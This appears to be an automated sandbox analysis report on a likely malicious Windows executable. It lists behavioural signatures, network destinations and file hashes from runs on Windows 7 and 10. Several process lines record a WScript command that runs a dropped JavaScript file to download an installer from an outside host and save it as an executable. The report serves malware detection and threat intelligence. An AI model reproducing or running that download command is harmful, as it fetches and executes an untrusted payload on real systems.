Analysis Overview
SHA256
065183bc01f4117eea2408f6625a9b0d238fec9f251d2538b02abaacd2cf7106
Threat Level: Likely malicious
The file 742be332927d3c9215c11e47cefd0e51_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Unsigned PE
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-26 03:17
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-26 03:17
Reported
2024-05-26 03:20
Platform
win7-20240215-en
Max time kernel
121s
Max time network
123s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\742be332927d3c9215c11e47cefd0e51_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\742be332927d3c9215c11e47cefd0e51_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1130.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1130.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1130.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1130.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1130.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1130.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1130.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1130.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1130.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1130.exe
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.hugedomains.com | udp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf1130.js
| MD5 | 3813cab188d1de6f92f8b82c2059991b |
| SHA1 | 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb |
| SHA256 | a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e |
| SHA512 | 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OOWQLMJV\domain_profile[1].htm
| MD5 | 4111118421f57b050e46ceccf8b6ced0 |
| SHA1 | 76d92b74fbf5f6c1d39d97a96a8d71ddacd5ad3c |
| SHA256 | 34f0d697d6eb41be89e722c651e9a0ecf00307f64969388b164fdcdd8038dfa8 |
| SHA512 | f59b0a141a5020683a9850477a07b183ec40792f01b8d6be6fe92d54bc47b9d3a137a552dbb6a4db0e74e19389257d4d367f963a4552fa64b4f68181daa3493a |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\PPA2MUFY.txt
| MD5 | aace5e9bfbc63533e58680ab3e35717e |
| SHA1 | 6eb451ad9a44b0ac552891a88b7f9bf3b194cc2a |
| SHA256 | dc05c230bd0c5fefebbd9e3c121fa4ad611e3bf5aa344e570d9fa7ad61fda3e5 |
| SHA512 | c2813c67e03f374b48c6eb2f737cb5b6bcf7025a3b8a061ab10e4bb423755cbfd77d3fce17c4f44a57f892891959a1bf9957239ee43eb119c9c7ded3c487af35 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1dc7afbaabfb27af8ce2ce784ee375e8 |
| SHA1 | 3ab47a21e10ed815f7d6a74e03337886976537ac |
| SHA256 | 31d9ffc822d6c77e6665a1d97a416a2602a9e1e775f32ade75ecc3eee3557c9e |
| SHA512 | 895a778711bc16573215e3293f3aa21bda52c1599cb3719b520bdf9053e00d8f2b2e2058bf4ee97c1693e4b79d7103f666e06b96f143aece19320eb2e45dc5f4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 8202a1cd02e7d69597995cabbe881a12 |
| SHA1 | 8858d9d934b7aa9330ee73de6c476acf19929ff6 |
| SHA256 | 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5 |
| SHA512 | 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | f42a12f1f39fc7b984c8aff5dc07cbe7 |
| SHA1 | b76b8cd52a1a4add8f504fd2310c34d0a7157754 |
| SHA256 | 2d043bb14d90baa75356a46ef039c8f5b975d6ad2317040bb686f69514ddd0a7 |
| SHA512 | 10a68fb9b8361bd764c7a7b5cced12c15bdab34137b0d40e5bbf8ef56e9c95785e5db7b70e6a48d9e5efce26c4aebb02181075a5a28a65da799864d806e03b62 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | dd3850d9ce5a33ba453ba4d1dfb4ba51 |
| SHA1 | df05b044dd14e7d009aad0398686bbfd6fff1491 |
| SHA256 | e9e041a83d7f3dbd6adfeda50b7ff9d3fd1abfcfb4fc5906d481c33db7072b85 |
| SHA512 | ec27ccc61d0133a76a612d5ddde2c6193f96302e17f66a75da8e1ad18ee871fe6b307e535317726449dc724331d4f48376d03201ad8d9dc2985aa0420d45b8e4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 69e8173ede06b40a095a6207332d260c |
| SHA1 | c2749497e8506e99a085d1a7f4a80fa2235d4fcb |
| SHA256 | 7c505b7e44fe709d6b9e55e1a5d09025cd3962a169be97acceb82929ee894e81 |
| SHA512 | 9b4df2d82d0908a12d35190b14374887077c98255963d3b899cf40bf067591c9d4420ee5ee28b075edd878bd52fd6c164ea8f4c9003fc1fb35715131d9613c7a |
C:\Users\Admin\AppData\Local\Temp\Cab405A.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\domain_profile[1].htm
| MD5 | 9f2bc8cac28bc3b78936c1715e6b404a |
| SHA1 | 569dc5054683f2cac6fa4fd2819e2553f51c5b02 |
| SHA256 | 8051ca3b8366cf7884f9c88cbb4a9605e0c189b4f2d7eb6a48cfde8f9f457b88 |
| SHA512 | b24d6a99966e5d2c355420e03d5e5c601fafc4c70a68edb6158a8b948e7e1993a35a03ff2101b007eac247c2de8732621ea656907571a530054477357748f44d |
C:\Users\Admin\AppData\Local\Temp\Tar58CB.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OOWQLMJV\domain_profile[1].htm
| MD5 | cd853adc85a57676032ca5b5b534eb55 |
| SHA1 | a896642fb6a2ffee080bf03eb68944f746a56801 |
| SHA256 | 04cba2319204665ddc2b3927c8869b555ca8f4f85d673e2940c80ab0b810f0bf |
| SHA512 | f9cdd008e4955902f2241cf30ecc5843da88e3e2f6577c8e882fa264f1691b21aeab3fe9cd83f442c4e544a6fee17e6ebf6e333d0f7a012eb73b1a8da9594b41 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\domain_profile[1].htm
| MD5 | 63dec8725452b8b20569682997eea84f |
| SHA1 | 9ab34d2f2a58212c7618b8248abbb843c554037c |
| SHA256 | 221ebeba1fb201dbceb1258da93f159cdff75ff3e4bd1c77f09ab64410212a70 |
| SHA512 | 35228957e0c0867629afb473846b7c405416e02f2b65e87853909b8b96458cefd2b9d373ab3109c16005c70581741e136771c24ba3c3324a02a6b769c169c695 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-26 03:17
Reported
2024-05-26 03:20
Platform
win10v2004-20240426-en
Max time kernel
136s
Max time network
105s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\742be332927d3c9215c11e47cefd0e51_JaffaCakes118.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\742be332927d3c9215c11e47cefd0e51_JaffaCakes118.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\742be332927d3c9215c11e47cefd0e51_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\742be332927d3c9215c11e47cefd0e51_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3354.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf3354.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3354.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf3354.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3354.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf3354.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3354.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf3354.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3354.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf3354.exe
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 18.119.154.66:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.hugedomains.com | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.154.119.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 18.119.154.66:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 18.119.154.66:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 18.119.154.66:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 34.205.242.146:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 8.8.8.8:53 | 146.242.205.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf3354.js
| MD5 | 3813cab188d1de6f92f8b82c2059991b |
| SHA1 | 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb |
| SHA256 | a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e |
| SHA512 | 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76 |